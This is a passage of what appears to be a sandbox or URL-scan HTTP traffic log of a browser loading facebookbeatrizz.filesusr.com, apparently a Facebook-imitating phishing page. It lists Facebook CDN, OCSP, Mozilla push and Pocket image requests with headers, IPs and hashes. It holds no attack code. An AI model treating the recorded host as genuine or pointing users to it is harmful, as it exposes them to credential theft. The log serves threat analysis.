'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: ysLXxReBUANTRrc2581QAcqhzRHj/USXWYow8ycLnNSztNOy3BVnh0/G5nx9CSRcGG68gljo0+B2MPOpGFqvQA== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/v-qA4RoF1B (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 3FaAS4SFAwWeL+xHIjmDw9Rkk2djS8AoO1uE1QWB3HbfCOQR92yt9HfOThd3ntkhp18i6Q2NAOEtUg8ZrS1psQ== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/SieMvexb4R (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: p+xxVY+PH4smgDWPhn57tVNAOo1SUdkOVoLJXvVYzzGSbPo7law4h6nLdEWVkUR568KLhemDr8g9tPk+CiwS/Q== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: YtYPmDReaFGatQUeGlFhldhupVG2lWHtJP5KSPV/+TlIvyFqXcLmyce+ltzLYS+bQmyyIIv0QIn95cUMzWUisw== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-S (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: cNRkbQHe0XNpa2wb/OQh8VSKRKdX3DnuqixMlGI5WnQqYQ2ajG1Dlc1dYYhhLDWMuvkylPCtO5FJNnZPv65c0Q== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 6104 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:04 GMT Last-Modified: Thu, 29 Sep 2022 06:54:20 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 3526d5ce1381ba26cbc553db057e1915 Sha1: fe01c920696448e8bf12e6fff877bce8281d34a2 Sha256: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53
GET /rsrc.php/y8/r/dF5SId3UHWd.svg HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55 31.13.72.12 HTTP/2 200 OK content-type: image/svg+xml vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 00:00:49 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: NiMA5zHIsmaYxSYEaw9fHg== x-fb-debug: H+2lSyBg+yFwZfvEQ8AagkTj6m0yDJIp6AsH122a3Mar+bWBeRK4XmkKNGMoaD4TFXtVi8HgQwN63fXYcBKrGg== priority: u=3,i content-length: 1027 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: SVG Scalable Vector Graphics image\012- HTML document text\012- HTML document, ASCII text, with very long lines (2384) Size: 1027 Md5: 362300e731c8b26698c526046b0f5f1e Sha1: 6cd41a329b54f1fb112080237f7fb4dc32d19a10 Sha256: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: 5C3qchabqYiPx7km8PF/4g== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	URL: push.services.mozilla.com/ FQDN: push.services.mozilla.com IP: 35.163.147.190 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 35.163.147.190 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: rUJ/+Y6asAf6W06sdtwZ9onoA3U= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F99f26bb4-2c5c-44ef-86d3-90fd05ec1ce0.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 99984d108bf31d733414f7f1352e17225ac21ac2dbfb4b1e7fa7ae80e5b6b822 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 9654 x-amzn-requestid: 7961f184-9476-43de-bf35-8ccb50ee1760 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZGVYsHA6oAMFvRA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63326904-05f567f7606462ac44f89987;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 03:07:48 GMT x-amz-cf-pop: SEA73-P1 x-cache: Miss from cloudfront x-amz-cf-id: XaB4TwXv4xy0Sy3dncNYZWEPEnHY5BkEHR7fZDK59APYkzH9DPdT7A== via: 1.1 a4fe306096165bb1e86e69365dc8fac2.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google date: Thu, 29 Sep 2022 04:20:40 GMT age: 15325 etag: "44cc19b21912d07f82a88af5b2fa6d3e370459bf" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 9654 Md5: 36ae9444071dd70dcf86802c370ffda9 Sha1: 44cc19b21912d07f82a88af5b2fa6d3e370459bf Sha256: 99984d108bf31d733414f7f1352e17225ac21ac2dbfb4b1e7fa7ae80e5b6b822
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe91221c7-ce03-4ea5-9826-7a53eaafc5e6.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: eabd1bfef29cad4045d688a909b9a8c88818d80bb432ce642d055583cf66d77d 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 9002 x-amzn-requestid: 0623931b-a4d6-49de-ba32-d071c08eddbd x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMKoiGKRIAMFhYQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be36-1573e2e91c85617424db019f;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:35:50 GMT x-amz-cf-pop: SEA73-P2, SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: mmSMfKcxGrh9meSHTynf1wRZLrzc4wejFbKSO6qaJ3hn8h4-QwAAcQ== via: 1.1 2a44ef7b9d28e74c78ffadeedcbb887c.cloudfront.net (CloudFront), 1.1 ead78c395f4bede3ec6cd7ea180e3d3a.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:50:26 GMT age: 38739 etag: "d76293673a7aa2861b069ced614cdcdb84fed6d3" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 9002 Md5: c80d7ce8a9d3fba54855e05731db759c Sha1: d76293673a7aa2861b069ced614cdcdb84fed6d3 Sha256: eabd1bfef29cad4045d688a909b9a8c88818d80bb432ce642d055583cf66d77d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F75de31dd-bbf0-4a21-bfac-94f0062f4da4.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: b5e79054f165f38b99f93a8128284f82076523988aeb102b85dd8ff1a2870d00 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 10023 x-amzn-requestid: 0cb6b9a1-0707-4094-b197-5a0add2df717 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMK4dHJLIAMFWmg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be9c-2d8bbb17157900f126c5bb3c;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:32 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: wZ2hBqHAdwimAVV3p-CJFrb9zQ-CTN5ar9CB-cu0mZoENYUFTKKPWQ== via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 ddaf46a95abcfc80e8eae76235e2127c.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 22:04:58 GMT age: 37867 etag: "e1067a2dfbc22e7eb196046d57bd1e17604dba75" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 10023 Md5: f4505f57697072468da82e0b536d0d5b Sha1: e1067a2dfbc22e7eb196046d57bd1e17604dba75 Sha256: b5e79054f165f38b99f93a8128284f82076523988aeb102b85dd8ff1a2870d00
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff5cbaf6d-fc16-4449-8b54-1d55f68eff4f.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 511f5aa33750cd4a02cf3968bf165ffa521e77cb4fb7135b516d7ad14e8b9d01 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 14073 x-amzn-requestid: 4ff72590-e28d-4d4b-af1a-4d62e75e3d66 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMKnpEsJoAMFlBQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be30-38b014a25551aa0a2ab04ccf;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:35:44 GMT x-amz-cf-pop: HIO50-C1, SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: dyDhatfeYzzSQpRY7JpOIu3VhjlI8IOWcKCLCBWYaxJ1CYgCxqdQjA== via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:49:42 GMT age: 38783 etag: "72603efba82d649ce5a7a0ca45dc830c0d9ef012" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 14073 Md5: 11594ce7500d8776bfd5162b17f87d72 Sha1: 72603efba82d649ce5a7a0ca45dc830c0d9ef012 Sha256: 511f5aa33750cd4a02cf3968bf165ffa521e77cb4fb7135b516d7ad14e8b9d01
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6362b4f1-5935-43c9-9147-6d019a1ea6cd.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 967e070aec3942c64cc6c4cfdc13d430825c9e5c26dbec5bb3d66237d5978dfc 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 4235 x-amzn-requestid: 60825c64-7743-4b16-b80d-d1195ccb0f23 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMK2nFsDoAMFRwg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be90-1898e5d9111db7c843c1ebb4;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:20 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: 